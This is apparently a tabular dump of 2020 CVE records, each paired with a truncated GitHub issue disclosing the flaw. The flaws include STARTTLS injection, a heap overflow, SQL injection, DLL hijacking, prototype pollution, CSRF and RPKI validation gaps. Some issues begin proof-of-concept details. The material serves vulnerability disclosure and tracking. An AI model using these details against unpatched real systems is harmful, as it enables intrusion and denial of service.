cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164
values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2020-15953 | 2020-07-27T07:15:10.910 | LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response in... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00060.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libetpan_project:libetpan:*:*:*:*:*:*:*:*",
"matchCriteriaId": "265D13E3-68BC-4CD7-B04E-A9713F74895F",
"versionEndExcluding": null,
"versionEndIncluding": "1.9.4",
"versionSt... | [
"74"
] | 74 | https://github.com/dinhvh/libetpan/issues/386 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"dinhvh",
"libetpan"
] | We found a STARTTLS issue in libEtPan which affects IMAP (and probably other protocols.)
When the server responds with its "let's do TLS now message", e.g. `A OK begin TLS\r\n`, libEtPan will read any data after the \r\n and save it into some internal buffer for later processing. This is problematic, because a MITM ... | Buffering issues with STARTTLS in IMAP | https://api.github.com/repos/dinhvh/libetpan/issues/386/comments | 5 | 2020-06-18T12:09:50Z | 2020-07-31T21:54:22Z | https://github.com/dinhvh/libetpan/issues/386 | 641,155,783 | 386 | 1,356 |
CVE-2020-8558 | 2020-07-27T20:15:12.413 | The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachabl... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact":... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/92315"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Exploit",
"Mailing List",
"Miti... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9586C74C-1239-4E96-89A6-F618D14EF889",
"versionEndExcluding": null,
"versionEndIncluding": "1.16.10",
"versionStar... | [
"420"
] | 420 | https://github.com/kubernetes/kubernetes/issues/92315 | [
"Exploit",
"Mitigation",
"Patch",
"Third Party Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating:
In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://... | CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary | https://api.github.com/repos/kubernetes/kubernetes/issues/92315/comments | 17 | 2020-06-19T18:38:58Z | 2021-12-02T22:54:39Z | https://github.com/kubernetes/kubernetes/issues/92315 | 642,156,921 | 92,315 | 1,357 |
CVE-2020-12460 | 2020-07-27T23:15:12.373 | OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 has improper null termination in the function opendmarc_xml_parse that can result in a one-byte heap overflow in opendmarc_xml when parsing a specially crafted DMARC aggregate report. This can cause remote memory corruption when a '\0' byte overwrites the heap metad... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/trusteddomainproject/OpenDMARC/issues/64"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debia... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:trusteddomain:opendmarc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "48B8EAC9-8D6C-404F-855E-6D23BE1A4E81",
"versionEndExcluding": null,
"versionEndIncluding": "1.3.2",
"versionStar... | [
"787"
] | 787 | https://github.com/trusteddomainproject/OpenDMARC/issues/64 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"trusteddomainproject",
"OpenDMARC"
] | There is a memory corruption vulnerability in `opendmarc_xml()` of libopendmarc during parsing of DMARC aggregate reports. The versions affected by this seem to be OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1.
The root cause is improper null termination. The function opendmarc_xml_parse() does not explicitl... | Memory corruption in opendmarc_xml() | https://api.github.com/repos/trusteddomainproject/OpenDMARC/issues/64/comments | 5 | 2020-07-25T10:48:50Z | 2020-09-20T10:18:12Z | https://github.com/trusteddomainproject/OpenDMARC/issues/64 | 665,563,517 | 64 | 1,358 |
CVE-2020-12845 | 2020-07-27T23:15:12.437 | Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://cherokee-project.com/downloads.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cherokee/webserver/i... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cherokee-project:cherokee:*:*:*:*:*:*:*:*",
"matchCriteriaId": "95AA5C29-D669-46CA-ADFC-91D47AD67050",
"versionEndExcluding": null,
"versionEndIncluding": "1.2.104",
"version... | [
"476"
] | 476 | https://github.com/cherokee/webserver/issues/1242 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cherokee",
"webserver"
] | Cherokee Web Server 0.4.27 to 1.2.104 have a NULL pointer dereference which leads to a denial of service.
Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW-Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Aut... | NULL pointer derefence during HTTP authentication | https://api.github.com/repos/cherokee/webserver/issues/1242/comments | 3 | 2020-07-25T11:07:45Z | 2020-07-25T20:17:14Z | https://github.com/cherokee/webserver/issues/1242 | 665,566,101 | 1,242 | 1,359 |
CVE-2020-8553 | 2020-07-29T15:15:13.450 | The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "PARTI... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/ingress-nginx/issues/5126"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/kubernetes/ingr... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60159025-3CB0-40E3-B960-4479582F192F",
"versionEndExcluding": "0.28.0",
"versionEndIncluding": null,
"versionSt... | [
"610"
] | 610 | https://github.com/kubernetes/ingress-nginx/issues/5126 | [
"Third Party Advisory"
] | github.com | [
"kubernetes",
"ingress-nginx"
] | A security issue was discovered in ingress-nginx versions older than v0.28.0. The issue is of medium severity, and upgrading is encouraged to fix the vulnerability.
**Am I vulnerable?**
The vulnerability exists only if the annotation [nginx.ingress.kubernetes.io/auth-type: basic](https://kubernetes.github.io/ingr... | CVE-2020-8553: ingress-nginx auth-type basic annotation vulnerability | https://api.github.com/repos/kubernetes/kubernetes/issues/126818/comments | 7 | 2020-02-19T19:00:32Z | 2024-08-20T17:54:47Z | https://github.com/kubernetes/kubernetes/issues/126818 | 2,475,652,594 | 126,818 | 1,360 |
CVE-2020-16143 | 2020-07-29T22:15:12.277 | The seafile-client client 7.0.8 for Seafile is vulnerable to DLL hijacking because it loads exchndl.dll from the current working directory. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.4,
"confidentialityImpact": "PARTIA... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/haiwen/seafile-client/issues/1309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seafile:seafile-client:7.0.8:*:*:*:*:seafile:*:*",
"matchCriteriaId": "DE8E7545-B834-4073-B7B4-7307CF492BC1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versi... | [
"427"
] | 427 | https://github.com/haiwen/seafile-client/issues/1309 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"haiwen",
"seafile-client"
] | **DLL:** exchndl.dll
**Affected Process:** seaf-daemon.exe
**Tested on:** Windows 10 Pro x64 Version 10.0.19041
**Description:**
Seafile Client ver 7.0.8 is vulnerable to DLL hijacking because it loads “exchndl.dll” from the current working directory.
**Steps to reproduce:**
1. Compile the following code ... | DLL Hijacking "exchndl.dll" | https://api.github.com/repos/haiwen/seafile-client/issues/1309/comments | 3 | 2020-07-22T09:30:42Z | 2021-02-20T12:35:36Z | https://github.com/haiwen/seafile-client/issues/1309 | 663,616,029 | 1,309 | 1,361 |
CVE-2020-7699 | 2020-07-30T09:15:11.373 | This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/richardgirges/express-fileupload/issues/236"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:express-fileupload_project:express-fileupload:*:*:*:*:*:*:*:*",
"matchCriteriaId": "75C3F9FC-7A2F-462D-84F9-F88152137F86",
"versionEndExcluding": "1.1.8",
"versionEndIncluding": null,
... | [
"1321"
] | 1321 | https://github.com/richardgirges/express-fileupload/issues/236 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"richardgirges",
"express-fileupload"
] | This module has prototype pollution vulnerablity
and it can make DOS with parseNested option.
## server
```js
const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();
app.use(fileUpload({ parseNested: true }));
app.get('/', (req, res) => {
res.end('... | Prototype Pollution | https://api.github.com/repos/richardgirges/express-fileupload/issues/236/comments | 5 | 2020-07-29T02:48:39Z | 2020-08-05T00:54:36Z | https://github.com/richardgirges/express-fileupload/issues/236 | 667,506,452 | 236 | 1,362 |
CVE-2020-16162 | 2020-07-30T16:15:11.850 | An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be cou... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A",
"versionEndExcluding": null,
"versionEndIncluding": "3.1-2020.07.06.14.28",
... | [
"295"
] | 295 | https://github.com/RIPE-NCC/rpki-validator-3/issues/162 | [
"Third Party Advisory"
] | github.com | [
"RIPE-NCC",
"rpki-validator-3"
] | This issue was also informally reported to RIPE NCC staff in late February 2020.
It appears that RIPE NCC validator doesn't consider an expired CRL cause to consider the associated manifest and underlaying objects invalid. It logs a warning, but does not consider this situation erroneous.
Theoretically a replay a... | An expired or missing CRL doesn't result in the manifest being considered invalid | https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/162/comments | 1 | 2020-03-30T14:33:10Z | 2020-07-07T10:25:09Z | https://github.com/RIPE-NCC/rpki-validator-3/issues/162 | 590,340,650 | 162 | 1,363 |
CVE-2020-16162 | 2020-07-30T16:15:11.850 | An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. Missing validation checks on CRL presence or CRL staleness in the X509-based RPKI certificate-tree validation procedure allow remote attackers to bypass intended access restrictions by using revoked certificates. NOTE: there may be cou... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A",
"versionEndExcluding": null,
"versionEndIncluding": "3.1-2020.07.06.14.28",
... | [
"295"
] | 295 | https://github.com/RIPE-NCC/rpki-validator-3/issues/232 | [
"Third Party Advisory"
] | github.com | [
"RIPE-NCC",
"rpki-validator-3"
] | According to documentation the default operating mode of the RIPE NCC Validator is `rpki.validator.strict-validation = false`, this means that by default the validator operates in an insecure mode which is detrimental to the users of the software.
It is beyond me why I have to open so many tickets to encourage the d... | RIPE NCC Validator by default is insecure | https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/232/comments | 3 | 2020-07-07T10:34:28Z | 2020-10-29T13:30:22Z | https://github.com/RIPE-NCC/rpki-validator-3/issues/232 | 652,210,852 | 232 | 1,364 |
CVE-2020-16163 | 2020-07-30T16:15:11.897 | An issue was discovered in RIPE NCC RPKI Validator 3.x before 3.1-2020.07.06.14.28. RRDP fetches proceed even with a lack of validation of a TLS HTTPS endpoint. This allows remote attackers to bypass intended access restrictions, or to trigger denial of service to traffic directed to co-dependent routing systems. NOTE:... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-valida... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A",
"versionEndExcluding": null,
"versionEndIncluding": "3.1-2020.07.06.14.28",
... | [
"295"
] | 295 | https://github.com/RIPE-NCC/rpki-validator-3/issues/159 | [
"Third Party Advisory"
] | github.com | [
"RIPE-NCC",
"rpki-validator-3"
] | RFC 8182 section 4.3 "HTTPS Considerations" states:
> Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server.
The *SHOULD* probably should be read as a *MUST*, given the validator's susceptibility to fetch from a compromised (MITM'ed) RRD... | RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate | https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/159/comments | 9 | 2020-03-24T13:45:25Z | 2020-07-07T10:26:16Z | https://github.com/RIPE-NCC/rpki-validator-3/issues/159 | 586,971,181 | 159 | 1,365 |
CVE-2020-16164 | 2020-07-30T16:15:11.943 | An issue was discovered in RIPE NCC RPKI Validator 3.x through 3.1-2020.07.06.14.28. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation Lis... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ripe:rpki_validator_3:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63CFA61A-E229-4D54-AC2A-DD5F60AA676A",
"versionEndExcluding": null,
"versionEndIncluding": "3.1-2020.07.06.14.28",
... | [
"295"
] | 295 | https://github.com/RIPE-NCC/rpki-validator-3/issues/158 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"RIPE-NCC",
"rpki-validator-3"
] | In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues.
When a manifest is valid (manifest is parsa... | Missing files don't result in a manifest being considered invalid | https://api.github.com/repos/RIPE-NCC/rpki-validator-3/issues/158/comments | 11 | 2020-03-23T17:35:24Z | 2020-07-07T10:26:57Z | https://github.com/RIPE-NCC/rpki-validator-3/issues/158 | 586,392,353 | 158 | 1,366 |
CVE-2020-16165 | 2020-07-30T20:15:12.737 | The DAO/DTO implementation in SpringBlade through 2.7.1 allows SQL Injection in an ORDER BY clause. This is related to the /api/blade-log/api/list ascs and desc parameters. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://gitee.com/smallc/SpringBlade"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chillzhuang/SpringBla... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:springblade_project:springblade:*:*:*:*:*:*:*:*",
"matchCriteriaId": "376B2181-19A7-4CDA-8254-6741D0DFB32D",
"versionEndExcluding": null,
"versionEndIncluding": "2.7.1",
"ver... | [
"89"
] | 89 | https://github.com/chillzhuang/SpringBlade/issues/9 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chillzhuang",
"SpringBlade"
] | tl;dr
Flaws in DAO/DTO implementation allows SQLi in order by clause.
User token and/or password hash disclosed in pre-auth APIs of which are vulnerable to SQLi above as well.
detail
```
/api/blade-log/api/list
```
is exposed by default install. For instance, the demo site.
![upload_aaa29b3ad97ede8813529433d... | Pre-auth SQL injection | https://api.github.com/repos/chillzhuang/SpringBlade/issues/9/comments | 3 | 2020-07-25T13:56:47Z | 2020-08-27T11:46:37Z | https://github.com/chillzhuang/SpringBlade/issues/9 | 665,589,577 | 9 | 1,367 |
CVE-2015-9549 | 2020-08-03T16:15:11.927 | A reflected Cross-site Scripting (XSS) vulnerability exists in OcPortal 9.0.20 via the OCF_EMOTICON_CELL.tpl FIELD_NAME field to data/emoticons.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://cybersecurityworks.com/zerodays/cve-2015-9549-ocportal.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ocportal:ocportal:9.0.20:*:*:*:*:*:*:*",
"matchCriteriaId": "A2450EFF-5D36-46A0-AAD9-D40F84CA1FDA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"79"
] | 79 | https://github.com/cybersecurityworks/Disclosed/issues/11 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cybersecurityworks",
"Disclosed"
] | As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE*}). This meant that ‘html entities’ are put in replacement of HTML control characters.
 with non-session based authentication methods. This vulnerability has been assigned the CVE identifier CVE-2020-16252.
Versions Affected: 0.2.0 to 0.3.2
Fixed Versions: 0.4.0
## Impact
The Field Test dashboard is vulnerable to CSR... | CSRF Vulnerability with Non-Session Based Authentication | https://api.github.com/repos/ankane/field_test/issues/28/comments | 0 | 2020-08-04T20:05:09Z | 2020-08-04T20:07:49Z | https://github.com/ankane/field_test/issues/28 | 673,048,818 | 28 | 1,369 |
CVE-2020-16253 | 2020-08-05T14:15:12.750 | The PgHero gem through 2.6.0 for Ruby allows CSRF. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ankane/pghero/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ankane/pghero/issues/330"
},
{
"source": "af854a3a-2127-4... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pghero_project:pghero:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "0A0E2E1D-781E-4FDA-88C7-6141B1623113",
"versionEndExcluding": null,
"versionEndIncluding": "2.6.0",
"versionSta... | [
"352"
] | 352 | https://github.com/ankane/pghero/issues/330 | [
"Third Party Advisory"
] | github.com | [
"ankane",
"pghero"
] | PgHero is vulnerable to cross-site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVE-2020-16253.
Versions Affected: 2.6.0 and below
Fixed Versions: 2.7.0
## Impact
The PgHero dashboard is vulnerable to cross-site request forgery (CSRF). This affects the Docker image, Linux pa... | CSRF Vulnerability | https://api.github.com/repos/ankane/pghero/issues/330/comments | 0 | 2020-08-04T19:31:45Z | 2020-08-04T20:07:44Z | https://github.com/ankane/pghero/issues/330 | 673,031,545 | 330 | 1,370 |
CVE-2020-16254 | 2020-08-05T20:15:14.740 | The Chartkick gem through 3.3.2 for Ruby allows Cascading Style Sheets (CSS) Injection (without attribute). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ankane/chartkick"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ankane/chartkick/issues/546"
},
{
"sou... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chartkick_project:chartkick:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "51676149-E541-4385-AD36-8DD8E2AD2593",
"versionEndExcluding": null,
"versionEndIncluding": "3.3.2",
"vers... | [
"74"
] | 74 | https://github.com/ankane/chartkick/issues/546 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ankane",
"chartkick"
] | The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the `width` or `height` option. This vulnerability has been assigned the CVE identifier CVE-2020-16254.
Versions Affected: 3.3.2 and below
Fixed Versions: 3.4.0
## Impact
Chartkick is vulnerable to CSS injection if user inpu... | CSS injection with width and height options | https://api.github.com/repos/ankane/chartkick/issues/546/comments | 5 | 2020-08-04T20:29:47Z | 2020-10-07T09:50:18Z | https://github.com/ankane/chartkick/issues/546 | 673,062,235 | 546 | 1,371 |
CVE-2020-17366 | 2020-08-05T22:15:12.277 | An issue was discovered in NLnet Labs Routinator 0.1.0 through 0.7.1. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from th... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/NLnetLabs/routinator/issues/319"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "htt... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nlnetlabs:routinator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C070C598-464A-419E-B545-286D3C3575D6",
"versionEndExcluding": null,
"versionEndIncluding": "0.7.1",
"versionStartEx... | [
"295"
] | 295 | https://github.com/NLnetLabs/routinator/issues/319 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"NLnetLabs",
"routinator"
] | In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain `.roa` files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues.
When a manifest is valid (manifest is par... | Missing files don't result in a Manifest/PP being considered invalid | https://api.github.com/repos/NLnetLabs/routinator/issues/319/comments | 11 | 2020-04-28T14:53:53Z | 2020-09-22T13:30:18Z | https://github.com/NLnetLabs/routinator/issues/319 | 608,383,235 | 319 | 1,372 |
CVE-2020-16248 | 2020-08-09T17:15:11.703 | Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability | {
